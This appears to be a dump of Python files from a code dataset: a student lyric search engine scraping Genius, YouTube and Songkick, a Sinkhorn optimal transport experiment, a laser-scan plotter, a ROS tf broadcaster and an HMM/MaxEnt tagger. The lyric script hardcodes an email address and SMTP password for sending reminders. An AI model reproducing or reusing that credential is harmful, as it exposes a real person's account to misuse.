== 200:\n print(\"HTTP error\",response3.status_code)\n else:\n try:\n response3_page = BeautifulSoup(response3.content,'lxml')\n except:\n print('Error happens.')\n continue\n except:\n print(\"Something went wrong with request.get\")\n continue\n try:\n name = response3_page.find('h1').get_text()\n except:\n print('Error happens in finding the album name.')\n name = 'unknown'\n continue\n if response3_page.find_all('div',class_='metadata_unit') != []:\n date = response3_page.find_all('div',class_='metadata_unit')[0].get_text()[9:]\n else:\n date = 'NA'\n songs = list()\n list_of_songs = response3_page.find_all('h3',class_='chart_row-content-title')\n for song in list_of_songs:\n pattern2 = r'[^\\n]+'\n string2 = song.get_text().strip()\n song_name = re.search(pattern2,string2).group()\n song_name = song_name[re.search(r'[^\\w]*',song_name).span()[1]:]\n songs.append(song_name.replace('\\xa0',' '))\n album_info = (date,songs)\n result[name] = album_info\n return result\n\n\n# ### search songs\n\n# In[4]:\n\n\ndef get_song_lyrics(top100_list): # top100_list contain (song_name,artist,lyrics)\n i=0\n song_lyrics_dict = dict()\n while i < len(top100_list):\n song_name = top100_list[i][0].strip()\n lyrics = top100_list[i][2].strip()\n song_lyrics_dict[song_name]= lyrics\n i = i+1\n return song_lyrics_dict # (song_name,lyrics)\n\n\n# In[5]:\n\n\ndef find_song(song_lyrics_dict,search_list): # song_lyrics_dict\n \n import re\n from nltk import word_tokenize\n \n song_name= []\n result_dict=dict()\n for key in song_lyrics_dict.keys():\n result_dict[key] = 1\n \n for sword in search_list:\n sword = sword.lower()\n for key,value in song_lyrics_dict.items():\n lyrics=value.replace(',','').lower()\n lyrics_list = word_tokenize(lyrics)\n if sword not in lyrics_list:\n result_dict[key]= 0\n \n for key, value in result_dict.items():\n if value:\n song_name.append(key)\n return song_name\n\n\n# ### song recommendation(similarity analysis)\n\n# In[6]:\n\n\ndef similar_song(song_name,lyric_list,lyric_dict):\n from gensim import corpora\n from gensim.parsing.preprocessing import STOPWORDS\n from gensim.similarities.docsim import Similarity\n from gensim import corpora, models, similarities\n\n # texts = [[word for word in doc.lower().split()\n # if word not in STOPWORDS and word.isalnum()]\n # for doc in reference_docs]\n\n all_song_info = lyric_list\n \n texts = [[word for word in song[2].lower().split()\n if word not in STOPWORDS and word.isalnum()]\n for song in all_song_info]\n\n dictionary = corpora.Dictionary(texts)\n corpus = [dictionary.doc2bow(text) for text in texts]\n\n lsi = models.LsiModel(corpus, id2word=dictionary, num_topics=5)\n lyrics = lyric_dict[song_name]\n vec_bow = dictionary.doc2bow(lyrics.lower().split())\n vec_lsi = lsi[vec_bow]\n lsi_index = similarities.MatrixSimilarity(lsi[corpus])\n sims = lsi_index[vec_lsi]\n sims = sorted(enumerate(sims), key=lambda item: -item[1])\n\n most_similar_song_num = sims[1][0]\n most_similar_song = all_song_info[most_similar_song_num]\n return most_similar_song\n\n\n# ### sentiment analysis\n\n# In[7]:\n\n\ndef get_nrc_data():\n nrc = \"NRC-emotion-lexicon-wordlevel-alphabetized-v0.92.txt\"\n count=0\n emotion_dict=dict()\n with open(nrc,'r') as f:\n all_lines = list()\n for line in f:\n if count < 46:\n count+=1\n continue\n line = line.strip().split('\\t')\n if int(line[2]) == 1:\n if emotion_dict.get(line[0]):\n emotion_dict[line[0]].append(line[1])\n else:\n emotion_dict[line[0]] = [line[1]]\n return emotion_dict\n\n\n# In[8]:\n\n\ndef emotion_analyzer(text,emotion_dict):\n #Set up the result dictionary\n emotions = {x for y in emotion_dict.values() for x in y} \n emotion_count = dict() \n for emotion in emotions:\n emotion_count[emotion] = 0\n\n #Analyze the text and normalize by total number of words\n total_words = len(text.split())\n for word in text.split():\n if emotion_dict.get(word): \n for emotion in emotion_dict.get(word):\n emotion_count[emotion] += 1/len(text.split())\n return emotion_count\n\n\n# In[9]:\n\n\ndef emotion_analyzer_and_recommend(song_name,text,dict_,lyric_list,lyric_dict):\n \n for key,value in lyric_dict.items():\n if key == song_name:\n text = value \n result = emotion_analyzer(text,dict_)\n emotions = {'fear': result['fear'], 'joy': result['joy'], 'anticipation': result['anticipation'],'sadness': result['sadness']}\n emotion = 'This is a song of '+ sorted(emotions,key=lambda x:emotions[x])[-1]\n similar = 'A similar song we recommend: ' + similar_song(song_name,lyric_list,lyric_dict)[0]\n print(emotion,'\\n',similar)\n return None\n\n\n# ## Song Info\n\n# #### Find the mv or a relevent trending video\n\n# In[10]:\n\n\ndef get_mv(song_name, singer):\n from bs4 import BeautifulSoup as bs\n import requests\n base = \"https://www.youtube.com/results?search_query=\"\n\n try:\n response = requests.get(base+song_name+singer)\n if not response.status_code == 200:\n print(\"HTTP error\",response.status_code)\n else:\n page = response.text\n soup = bs(page,'html.parser')\n except:\n print('Cannot parse using BeautifulSoup.')\n return None\n vids = soup.findAll('a',attrs={'class':'yt-uix-tile-link'})\n if len(vids) != 0:\n mv = vids[0]\n if 'http' in mv['href']:\n mv = vids[1]\n mv_link = 'https://www.youtube.com' + mv['href']\n\n else:\n mv_link = 'NO MV FOUND'\n print(my_link)\n if mv_link != 'NO MV FOUND':\n while True:\n whether = str(input('Do you want to watch its MV or the trending relevent video on Youtube right now? [y/n] '))\n if whether.lower() == 'y' or whether.lower() == 'n':\n break\n else:\n print('Wrong input! Try again.')\n if whether.lower() == 'y':\n import webbrowser\n webbrowser.open(mv_link, new=0, autoraise=True)\n else:\n print()\n print('Here is the link to the mv for you to enjoy later: ' + mv_link)\n print()\n return None\n\n \n\n\n# #### Concert info\n\n# In[11]:\n\n\ndef get_concert(singer,city = None):\n try:\n import requests\n from bs4 import BeautifulSoup as bs \n base = \"https://www.songkick.com/search?utf8=✓&type=initial&query=\"\n qstring = singer\n try:\n r = requests.get(base+qstring)\n if not r.status_code == 200:\n print(\"HTTP error\",r.status_code)\n else:\n page = r.text\n soup = bs(page,'lxml')\n except:\n print('Cannot parse using BeautifulSoup.')\n return None\n vids = soup.findAll('a',attrs={'class':'yt-uix-tile-link'})\n events = soup.findAll('li',attrs={'class':'artist'})\n artist = events[0].findAll('a')[1]\n artist_link = \"https://www.songkick.com\" + artist['href']\n r = requests.get(artist_link)\n page = r.text\n soup=bs(page,'lxml')\n tour = soup.findAll('li',attrs={'class':'ontour'})\n on_tour = tour[0].get_text()\n if on_tour[-2:] == 'no':\n print('Sorry, %s is not on tour.' % singer)\n return None\n else:\n upcoming = soup.findAll('p', class_ = 'see-all')\n upcoming_link = \"https://www.songkick.com\" + upcoming[0].find('a')['href']\n try:\n r = requests.get(upcoming_link)\n if not r.status_code == 200:\n print(\"HTTP error\",r.status_code)\n else:\n page = r.text\n soup = bs(page,'html.parser')\n except:\n print('Cannot parse using BeautifulSoup.')\n return None\n events = soup.find('ul',class_=\"event-listings artist-focus\")\n concert_list = list()\n concert_list = get_venue_and_time(events)\n if len(concert_list) == 0:\n print('Sorry, %s is not on tour.' % singer)\n return None\n print()\n whether = str(input('Do you want to see info for all concerts? [y/n] '))\n if whether.lower() == 'y':\n print()\n for concert in concert_list:\n print(concert[:(concert.find('; Link to ticket'))])\n print()\n if city is None:\n return None\n print()\n whether_city = str(input('Do you want to check if a concert will be held in the city you want? [y/n] '))\n if whether_city.lower() == 'y':\n found = check_city(city, concert_list)\n if found is not None:\n print()\n whether_ticket = str(input('Do you want to buy the tickets? [y/n] '))\n if whether_ticket and whether_ticket.lower() == 'y':\n try:\n ticket_link(found,singer)\n except:\n pass\n return None\n except:\n print('No concert info available on songkick.com.')\n print()\n return None\n \n\n\n# In[12]:\n\n\ndef get_venue_and_time(events):\n concert_list = list()\n results = events.find_all('li')\n for i in range(len(results)):\n if results[i].attrs.get('class') == ['with-date']:\n when = results[i].get_text().replace('\\n','')\n locations = results[i+1].find('p',class_ = 'location')\n try:\n ticket = 'https://www.songkick.com' + results[i+1].find('span',class_=\"button buy-tickets\").parent.get('href')\n except:\n ticket = 'Sorry, ticket is not on sale yet.'\n venue = locations.find_all('span')[0]\n city = locations.find_all('span')[1]\n where = \" \".join(venue.get_text().replace('\\n','').split()) + ', '+ \" \".join(city.get_text().replace('\\n','').split())\n concert_list.append('Time: %s; Location: %s; Link to ticket: %s' % (when, where, ticket))\n return concert_list\n\n\n# In[13]:\n\n\ndef check_city(city, list_):\n import re\n found = list()\n for i in range(len(list_)):\n if city.lower() in list_[i].lower():\n found.append(list_[i])\n if len(found) > 0:\n print()\n print('Great new, concerts will be held in the city you want!')\n print()\n for concert in found:\n print(concert[:(concert.find('; Link to ticket'))])\n print()\n return found\n else:\n print()\n print('Sorry, no concert will be held in the city you want. Stay tuned!')\n print()\n return None\n \n \n \n\n\n# In[14]:\n\n\ndef ticket_link(found_list,singer):\n ticket_list = list()\n contains_http = False\n for concert in found_list:\n info = concert[:(concert.find('; Link to ticket'))]\n ticket = concert[(concert.find('; Link to ticket'))+1:]\n if 'http' in ticket:\n contains_http = True\n print()\n print(info)\n print()\n print(ticket)\n print()\n ticket_list.append((info,ticket))\n \n if contains_http == True:\n done = False\n while True:\n selection = input('Do you want me to send you a reminder email? [y/n] ')\n if selection.lower() == 'y' or selection.lower() == 'n':\n break\n else:\n print('Wrong input! Try again.')\n if selection.lower() == 'y':\n account = str(input(\"Please enter your email account as a string(e.g. 'instance@example.com'): \"))\n elif selection.lower() == 'n':\n print()\n print('See ya!')\n print()\n else:\n print('Wrong input!')\n print()\n if account:\n try:\n import smtplib \n \n fromMy = 'antonio_ye@yahoo.com' \n to = str(account)\n subj='Gotta buy those tickets!'\n date='11/29/2018'\n for info in ticket_list:\n text = info[0] + '\\n' + info[1] + '\\n\\n'\n message_text='Here is the ticket info for the concerts of %s in your city:\\n\\n' % str(singer) + text + 'Your Tools for Analytics Students'\n\n msg = \"From: %s\\nTo: %s\\nSubject: %s\\nDate: %s\\n\\n%s\" % ( fromMy, to, subj, date, message_text )\n username = str('antonio_ye@yahoo.com') \n password = str('NRBDkTqMPvN4Aqg') \n\n server = smtplib.SMTP(\"smtp.mail.yahoo.com\",587)\n server.ehlo() \n server.starttls()\n server.login(username,password)\n server.sendmail(fromMy, to,msg)\n server.quit() \n print('Sent! Enjoy the show. Note that the email may take several minutes to arrive...')\n print()\n except:\n print('Oops! An error occurred.')\n print()\n \n return None\n\n\n# ## main functions\n\n# #### name seperater (if multiple singers)\n\n# In[15]:\n\n\ndef seperate_name(singer):\n singer = singer.replace(' x ',' & ').replace(' X ',' & ').replace(' Featuring ',' & ').replace(', ',' & ')\n singer = singer.split(' & ')\n if len(singer) == 1:\n return singer[0]\n else:\n for i in range(len(singer)):\n print('%s.%s' % (str(i+1),singer[i]))\n print()\n which_singer = int(input('More than one singer in this song! Please select who you want to know about: '))\n singer = singer[which_singer-1]\n return singer\n \n\n \n\n\n# #### song search main function\n\n# In[16]:\n\n\ndef find_song_based_on_search(list_of_songs,songs_with_lyrics,song_lyrics_dict,search_string=None,first_time=None):\n if not first_time:\n search_string = str(input('Please enter a lyric string: '))\n print('Searching, please be patient...')\n print()\n song_name = find_song(song_lyrics_dict,search_string.split())\n \n if len(song_name) == 1:\n the_one_name = song_name[0]\n print(the_one_name)\n for trio in songs_with_lyrics:\n if trio[0] == the_one_name:\n corresponding_artist = trio[1]\n lyric = trio[2]\n return the_one_name,corresponding_artist,lyric\n if len(song_name) > 1:\n for i in range(len(song_name)):\n print('%s.%s' % (str(i+1),song_name[i]))\n print()\n which_song = int(input('More than one song found! Hear them out and select which one you like the most (enter its number): '))\n the_one_name = song_name[which_song-1]\n for trio in songs_with_lyrics:\n if trio[0] == the_one_name:\n corresponding_artist = trio[1]\n lyric = trio[2]\n return the_one_name,corresponding_artist,lyric\n elif len(song_name) == 0:\n print('Sorry, based on our search, your search does not match any records of the recent trending songs...')\n print()\n return None,None,None\n\n\n# #### main menu\n\n# In[17]:\n\n\ndef get_info_main_menu(song,name,lyric,lyric_list,lyric_dict):\n done = False\n while done is not True:\n print('--------------------------------------------')\n print('1.Watch its MV or a trending relevent video')\n print('2.Check concert info')\n print('3.See albums of this singer')\n print('4.Find a similar song')\n print('5.Quit')\n print()\n selection = str(input('Please make a choice: ')).replace('.','')\n if selection == '1':\n get_mv(song, name)\n while True:\n main_menu = str(input('Would you like to go back to main menu? [y/n] '))\n if main_menu.lower() == 'y' or main_menu.lower() == 'n':\n break\n else:\n print('Wrong input! Try again.')\n if main_menu.lower() == 'n':\n done = True\n elif selection == '2':\n singer = seperate_name(name)\n whether_city = str(input('Do you want to find out about a specific city? [y/n] '))\n if whether_city == 'y':\n city_name = str(input('Please enter a city name: '))\n get_concert(singer,city = city_name)\n else:\n get_concert(singer,city = None)\n while True:\n main_menu = str(input('Would you like to go back to main menu? [y/n] '))\n if main_menu.lower() == 'y' or main_menu.lower() == 'n':\n break\n else:\n print('Wrong input! Try again.')\n if main_menu.lower() == 'n':\n done = True\n elif selection == '3':\n singer = seperate_name(name)\n albums = album_info(singer) \n if len(albums) > 0:\n print()\n print('Previous album(s) of this singer (album name : release date, [songs in this album]): ')\n print(albums)\n print()\n else:\n print('Somehow this singer does not have any album...')\n print()\n while True:\n main_menu = str(input('Would you like to go back to main menu? [y/n] '))\n if main_menu.lower() == 'y' or main_menu.lower() == 'n':\n break\n else:\n print('Wrong input! Try again.')\n if main_menu.lower() == 'n':\n done = True\n elif selection == '4':\n emotion_dict = get_nrc_data()\n emotion_analyzer_and_recommend(song,lyric,emotion_dict,lyric_list,lyric_dict)\n while True:\n main_menu = str(input('Would you like to go back to main menu? [y/n] '))\n if main_menu.lower() == 'y' or main_menu.lower() == 'n':\n break\n else:\n print('Wrong input! Try again.')\n if main_menu.lower() == 'n':\n done = True\n elif selection == '5':\n done = True\n else:\n print('Wrong number. Try again.')\n print()\n print() \n return None\n\n\n# #### run them all\n\n# In[18]:\n\n\ndef run_all():\n # for the first time searching\n while True:\n try:\n search_string = str(input('Please enter a lyric string: '))\n print('Searching for the first time. May take around 1 minute, please be patient...')\n print()\n list_of_songs = get_top100_list()\n songs_with_lyrics = get_all_info(list_of_songs)\n song_lyrics_dict = get_song_lyrics(songs_with_lyrics)\n song, singer, lyric = find_song_based_on_search(list_of_songs, songs_with_lyrics, song_lyrics_dict,\n search_string, first_time=True)\n if song:\n get_info_main_menu(song, singer, lyric, songs_with_lyrics, song_lyrics_dict)\n while True:\n answer = str(input('Do you want to search for another lyric string? [y/n] '))\n if answer.lower() == 'y' or answer.lower() == 'n':\n break\n else:\n print('Wrong input! Try again.')\n print()\n if answer == 'n':\n print()\n print('Bye-bye.')\n print()\n return None\n break\n except:\n print('Please try again.')\n print()\n\n # for searching after the first\n while True:\n try:\n while True:\n song, singer, lyric = find_song_based_on_search(list_of_songs, songs_with_lyrics, song_lyrics_dict)\n if song:\n get_info_main_menu(song, singer, lyric, songs_with_lyrics, song_lyrics_dict)\n while True:\n answer = str(input('Do you want to search for another lyric string? [y/n] '))\n if answer.lower() == 'y' or answer.lower() == 'n':\n break\n else:\n print('Wrong input! Try again.')\n print()\n if answer == 'n':\n print()\n print('Bye-bye.')\n print()\n return None\n except:\n print('Please try again.')\n print()\n return None\n\n\n# In[19]:\n\n\nrun_all()\n\n","sub_path":"lyric_search_engine.py","file_name":"lyric_search_engine.py","file_ext":"py","file_size_in_byte":26306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"531688144","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom UOT import *\nimport pdb\nimport cvxpy as cp\n\nnp.random.seed(9999)\n\nnr = 100\nnc = 100\neta = 1\ntau = 5\nC = np.random.uniform(low=1, high=10, size=(nr, nc))\nC = (C + C.T) / 2\nr = np.random.uniform(low=0.1, high=1, size=(nr, 1))\nc = np.random.uniform(low=0.1, high=1, size=(nc, 1))\n\ndef solve_g_dual_cp(C, a, b, eta, tau):\n u = cp.Variable(shape=a.shape)\n v = cp.Variable(shape=b.shape)\n\n u_stack = cp.vstack([u.T for _ in range(nr)])\n v_stack = cp.hstack([v for _ in range(nc)])\n print(u_stack.shape, v_stack.shape)\n\n # obj = eta * cp.sum(cp.multiply(cp.exp(u + v.T) * cp.exp(v).T, 1 / cp.exp(C)))\n # obj = eta * cp.sum(cp.multiply(cp.exp(u_stack + v_stack), 1 / cp.exp(C)))\n obj = eta * cp.sum(cp.exp((u_stack + v_stack - C) / eta))\n obj += tau * cp.sum(cp.multiply(cp.exp(- u / tau), a))\n obj += tau * cp.sum(cp.multiply(cp.exp(- v / tau), b))\n\n prob = cp.Problem(cp.Minimize(obj))\n prob.solve()\n\n return prob.value, u.value, v.value\n\nopt_val, ustar, vstar = solve_g_dual_cp(C, r, c, eta, tau)\nprint(ustar.shape, vstar.shape)\nustar = ustar.reshape(-1, 1)\nvstar = vstar.reshape(-1, 1)\n\nu, v, info = sinkhorn_uot(C, r, c, eta=eta, t1=tau, t2=tau, early_stop=False, n_iter=1000)\n\ndelta_list = []\ngeom_list = []\n\nmax_ratio_list = []\nratio_list = []\nbound_list = []\n\n\nprint(info['stop_iter'])\nfor i in range(info['stop_iter']):\n delta = np.max([supnorm(info['u_list'][i] - ustar), supnorm(info['v_list'][i] - vstar)])\n delta_list.append(delta)\n\n if i == 0:\n geom_list.append(delta)\n bound_list.append(tau * (np.max([supnorm(np.log(r)), supnorm(np.log(c))]) + np.max([supnorm(C) / eta - np.log(nr), np.log(nr)])))\n else:\n geom_list.append(geom_list[-1] * (tau / (tau + eta)))\n bound_list.append(bound_list[-1] * (tau / (tau + eta)))\n\n\n max_ratio = geom_list[-1] / delta_list[-1]\n max_ratio_list.append(max_ratio)\n\n if i > 0:\n ratio = delta_list[-2] / delta_list[-1]\n ratio_list.append(ratio)\n\n# print(delta_list)\nprint(geom_list)\nfig, ax = plt.subplots(2, 1)\nplt.rcParams.update({'font.size': 22})\n# plt.figure(figsize=(10, 8))\nax[0].plot(range(info['stop_iter']-1), ratio_list, linewidth=2, label='$\\Delta_{k-1} / \\Delta_{k}$')\nax[1].plot(range(info['stop_iter']+1), info['f_val_list'], linewidth=2)\n# plt.plot(epsilon_list, [tmp / 1000 for tmp in k_list_empirical_true], \"r\", linewidth=4, label=r\"$k_{true}$\")\n# plt.plot(epsilon_list, [tmp / 1000 for tmp in k_list_empirical_first], \"g\", linewidth=4, label=r\"$k_{first}$\")\n# plt.plot(epsilon_list, [tmp / 1000 for tmp in k_list_formula], \"b\", linewidth=4, label=r\"$k_{formula}$\")\n# plt.xlabel(\"epsilon\")\nplt.xlabel(\"k (iterations)\")\nplt.legend(prop={'size': 30})\n\nplt.savefig('delta_rate.eps', bbox_inches='tight')\n# plt.savefig('k_comparison.png', bbox_inches='tight')\nplt.show()\n","sub_path":"geo_rate_delta.py","file_name":"geo_rate_delta.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"302573246","text":"import pylab\nfrom math import *\nimport time\nfrom numpy import *\n\npylab.ion()\n\nnum_scans = 30\nscan_size = 681\nmin_angle = -2.08621\nmax_angle = 2.08621\nangle_increment = 0.00613592 \n\n\ndiscard_headers = lambda text: text[6:]\ndata2float = lambda string: float(string[:-1])\n\ndata = []\n\nfor i in range(1, num_scans + 1):\n f = open('scans2/scan' + str(i) + '.txt')\n text = discard_headers(f.readlines())\n current_scan = [data2float(text[i]) for i in range(len(text))]\n data.append(current_scan)\n\ndef plotScan(scan):\n x_data = [scan[it] * cos(min_angle + it*angle_increment) for it in range(len(scan))]\n y_data = [scan[it] * sin(min_angle + it*angle_increment) for it in range(len(scan))]\n pylab.plot(x_data, y_data, 'ro')\n pylab.show()\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\nplt.ion()\n\n# def f(x, y):\n# return np.sin(x) + np.cos(y)\n\n# x = np.linspace(0, 2 * np.pi, 120)\n# y = np.linspace(0, 2 * np.pi, 100).reshape(-1, 1)\n\n# im = plt.imshow(f(x, y), cmap=plt.get_cmap('jet'))\n\n# def updatefig(*args):\n# global x,y\n# x += np.pi / 15.\n# y += np.pi / 20.\n# im.set_array(f(x,y))\n# return im,\n\n# ani = animation.funcanimation(fig, updatefig, interval=50, blit=true)\n# plt.show()\n\nget_x = lambda scan: array([scan[it] * cos(min_angle + it*angle_increment) for it in range(len(scan))])\nget_y = lambda scan: array([scan[it] * sin(min_angle + it*angle_increment) for it in range(len(scan))])\n\nfig = plt.figure()\nax1 = plt.subplot(121)\nax1.axis([-5,5,-5,5])\n\nif True:\n scatter, = plt.plot(get_x(data[20]), get_y(data[20]), 'ro')\n scatter.set_data([], [])\n x_data = get_x(data[0])\n y_data = get_y(data[0])\n scatter.set_data(x_data, y_data)\n \nax2 = plt.subplot(122)\nax2.axis([-5,5,-5,5])\n\n\nscatter, = plt.plot(get_x(data[20]), get_y(data[20]), 'ro')\nscatter.set_data([], [])\n\ndef update_plot(i):\n x_data = get_x(data[i])\n y_data = get_y(data[i])\n scatter.set_data(x_data, y_data)\n # plt.draw()\n # time.sleep(0.5)\n # scatter.set_data([], [])\n return scatter,\n\nani = animation.FuncAnimation(fig,\n update_plot,\n interval=50,\n frames=xrange(num_scans),\n blit=False)\nplt.show()\n","sub_path":"python/matplotlib/laserScans/analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"100309773","text":"#!/usr/bin/env python\n\nimport rospy\nimport tf\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Twist\n\n\n\ndef robot1frame(odom):\n\tbr = tf.TransformBroadcaster()\n\tx = odom.pose.pose.position.x\n\ty = odom.pose.pose.position.y\n\tz = odom.pose.pose.position.z\n\tqx = odom.pose.pose.orientation.x\n\tqy = odom.pose.pose.orientation.y\n\tqz = odom.pose.pose.orientation.z\n\tqw = odom.pose.pose.orientation.w\n\tbr.sendTransform((x,y,z),(qx,qy,qz,qw),rospy.Time.now(),\"robot1/trueOdom\",\"robot1/world\")\n\t\n# creates a fixed goal frame called \"goal\" in tf \ndef goalframe(twi):\n\tbr = tf.TransformBroadcaster()\n\trate = rospy.Rate(10.0)\n\tx = twi.linear.x\n\ty = twi.linear.y\n\tbr.sendTransform((x,y,0.0),(0.0,0.0,0.0,1.0),rospy.Time.now(),\"robot1/goal\",\"robot1/world\")\n\nif __name__ == '__main__':\n try:\n \trospy.init_node('tf_boadcaster1',anonymous=True)\n \trospy.Subscriber(\"/robot_1/base_pose_ground_truth\",Odometry,robot1frame)\n \trospy.Subscriber(\"/robot_1/goal\",Twist,goalframe)\n \trospy.spin()\n except rospy.ROSInterruptException: pass","sub_path":"src/frames1.py","file_name":"frames1.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"203536271","text":"import csv\nimport numpy as np\nimport random\nimport ast\n\nimport nltk\nimport nltk.classify.util\nimport nltk.metrics\nfrom nltk.classify import MaxentClassifier\nfrom nltk.collocations import BigramCollocationFinder\nfrom nltk.metrics import BigramAssocMeasures\nfrom nltk.probability import FreqDist, ConditionalFreqDist\nfrom sklearn.model_selection import cross_validate\nfrom nltk.classify import MaxentClassifier\n\n\ndef calculate_transition_probs(labels):\n counts = {}\n for label_set in labels:\n for i in range(len(label_set)):\n if i < 1:\n prev_label = \"\"\n counts[\"\"] = counts.get(\"\", 0) + 1\n\n else:\n prev_label = str(label_set[i-1])\n curr_label = str(label_set[i])\n\n counts[curr_label] = counts.get(curr_label, 0) + 1\n counts[prev_label +\n curr_label] = counts.get(prev_label + curr_label, 0) + 1\n return counts\n\n\ndef hmm_counts(words, labels):\n counts = {\"\": 0}\n x = 0\n for x in range(len(labels)):\n for i in range(len(labels[x])):\n curr_word = words[x][i]\n curr_label = str(labels[x][i])\n if(not curr_word+curr_label in counts.keys()):\n counts[\"\"] += 1\n counts[curr_word +\n curr_label] = counts.get(curr_word + curr_label, 0) + 1\n return counts\n\n\ndef return_featureset(words, pos_seq, i):\n feature_dict = {}\n feature_dict[\"POS\"] = pos_seq[i]\n feature_dict[\"word\"] = words[i]\n if i >= 2:\n feature_dict[\"2before\"] = words[i-2]\n feature_dict[\"1before\"] = words[i-1]\n else:\n feature_dict[\"2before\"] = None\n feature_dict[\"1before\"] = None\n if i < len(words)-2:\n feature_dict[\"1after\"] = words[i+1]\n feature_dict[\"2after\"] = words[i+2]\n else:\n feature_dict[\"1after\"] = None\n feature_dict[\"2after\"] = None\n\n return feature_dict\n\n\ndef create_classifier():\n with open('./data_release/train.csv', encoding='latin-1') as f:\n feature_set = []\n lines = csv.reader(f)\n next(lines)\n for line in lines:\n label_seq = ast.literal_eval(line[2])\n words = line[0].split()\n pos_seq = ast.literal_eval(line[1])\n for i in range(len(words)):\n feature_dict = return_featureset(words, pos_seq, i)\n feature_set.append((feature_dict, label_seq[i]))\n\n classifier = nltk.MaxentClassifier.train(feature_set, max_iter=2)\n return classifier\n\n\ndef viterbi_segment(text, pos_seq, counts, classifier, hmmcounts, isHMM):\n n = len(text)\n words = [''] + list(text)\n\n SCORE = [0]*2\n for i in range(2):\n SCORE[i] = [0] * n\n BPTR = [0]*2\n for i in range(2):\n BPTR[i] = [0] * n\n\n feature_dict = return_featureset(words, pos_seq, 0)\n probs = classifier.prob_classify(featureset=feature_dict)\n SCORE[0][0] = (counts[\"0\"]/counts[\"\"]) * \\\n classifier.prob_classify(featureset=feature_dict).prob(0)\n SCORE[1][0] = (counts[\"1\"]/counts[\"\"]) * \\\n classifier.prob_classify(featureset=feature_dict).prob(1)\n #SCORE[0][0] = classifier.prob_classify(featureset=feature_dict).prob(0)\n #SCORE[1][0] = classifier.prob_classify(featureset=feature_dict).prob(1)\n BPTR[0][0] = None\n BPTR[1][0] = None\n\n c = 0\n\n for t in range(1, n):\n if(not isHMM):\n if classifier.prob_classify(feature_dict).prob(0) < classifier.prob_classify(feature_dict).prob(1)+.5:\n # print(\"HERE\")\n # print(classifier.prob_classify(feature_dict).prob(0))\n # print(classifier.prob_classify(feature_dict).prob(1))\n c += 1\n feature_dict = return_featureset(words, pos_seq, t)\n\n if SCORE[0][t-1]*(counts[\"00\"]/counts[\"0\"]) >= SCORE[1][t-1] * (counts[\"10\"]/counts[\"1\"]):\n #SCORE[0][t] = SCORE[0][t-1]* (counts[\"00\"]/counts[\"0\"]) * classifier.prob_classify(feature_dict).prob(0)\n SCORE[0][t] = SCORE[0][t-1] * \\\n classifier.prob_classify(feature_dict).prob(0)\n BPTR[0][t] = 0\n else:\n #SCORE[0][t] = SCORE[1][t-1]* (counts[\"10\"]/counts[\"1\"]) * classifier.prob_classify(feature_dict).prob(0)\n SCORE[0][t] = SCORE[1][t-1] * \\\n classifier.prob_classify(feature_dict).prob(0)\n BPTR[0][t] = 1\n\n if SCORE[0][t-1]*(counts[\"01\"]/counts[\"0\"]) >= SCORE[1][t-1] * (counts[\"11\"]+1000/counts[\"1\"]):\n #SCORE[1][t] = SCORE[0][t-1]*(counts[\"01\"]/counts[\"0\"]) * classifier.prob_classify(feature_dict).prob(1)\n SCORE[1][t] = SCORE[0][t-1] * \\\n (classifier.prob_classify(feature_dict).prob(1)+.5)\n BPTR[1][t] = 0\n else:\n #SCORE[1][t] = SCORE[1][t-1]*(counts[\"11\"]/counts[\"1\"]) * classifier.prob_classify(feature_dict).prob(1)\n SCORE[1][t] = SCORE[1][t-1] * \\\n (classifier.prob_classify(feature_dict).prob(1)+.5)\n BPTR[1][t] = 1\n else:\n feature_dict = return_featureset(words, pos_seq, t)\n\n word0 = \"\"\n word1 = \"\"\n if(feature_dict[\"word\"]+\"0\" in hmmcounts.keys()):\n word0 = feature_dict[\"word\"]+\"0\"\n elif(feature_dict[\"word\"]+\"1\" in hmmcounts.keys()):\n word1 = feature_dict[\"word\"]+\"1\"\n\n if SCORE[0][t-1]*(counts[\"00\"]/counts[\"0\"]) >= SCORE[1][t-1] * (counts[\"10\"]/counts[\"1\"]):\n SCORE[0][t] = SCORE[0][t-1] * \\\n (counts[\"00\"]/counts[\"0\"]) * (hmmcounts[word0]/counts[\"0\"])\n BPTR[0][t] = 0\n else:\n SCORE[0][t] = SCORE[1][t-1] * \\\n (counts[\"10\"]/counts[\"1\"]) * (hmmcounts[word0]/counts[\"0\"])\n BPTR[0][t] = 1\n\n if SCORE[0][t-1]*(counts[\"01\"]/counts[\"0\"]) >= SCORE[1][t-1] * (counts[\"11\"]/counts[\"1\"]):\n SCORE[1][t] = SCORE[0][t-1] * \\\n (counts[\"01\"]/counts[\"0\"]) * (hmmcounts[word1]/counts[\"1\"])\n BPTR[1][t] = 0\n else:\n SCORE[1][t] = SCORE[1][t-1] * \\\n (counts[\"11\"]/counts[\"1\"]) * (hmmcounts[word1]/counts[\"1\"])\n BPTR[1][t] = 1\n\n sequence = []\n counter = n-1\n\n if SCORE[0][n-1] > SCORE[1][n-1]:\n sequence.append(0)\n a = BPTR[0][counter]\n else:\n sequence.append(1)\n a = BPTR[1][counter]\n\n while a is not None:\n counter -= 1\n sequence.append(a)\n a = BPTR[a][counter]\n print(sequence[::-1])\n return sequence[::-1]\n\n\ndef predict_classes():\n total_labels = []\n total_words = []\n with open('./data_release/train.csv', encoding='latin-1') as f:\n lines = csv.reader(f)\n next(lines)\n for line in lines:\n word_seq = line[0].split()\n label_seq = ast.literal_eval(line[2])\n total_words.append(word_seq)\n total_labels.append(label_seq)\n\n counts = calculate_transition_probs(total_labels)\n hmmC = hmm_counts(total_words, total_labels)\n classifier = create_classifier()\n\n with open('./data_release/train.csv', encoding='latin-1') as f:\n lines = csv.reader(f)\n next(lines)\n for line in lines:\n words = line[0].split()\n pos_seq = ast.literal_eval(line[1])\n curr_sequence = viterbi_segment(\n words, pos_seq, counts, classifier, hmmC, True)\n # 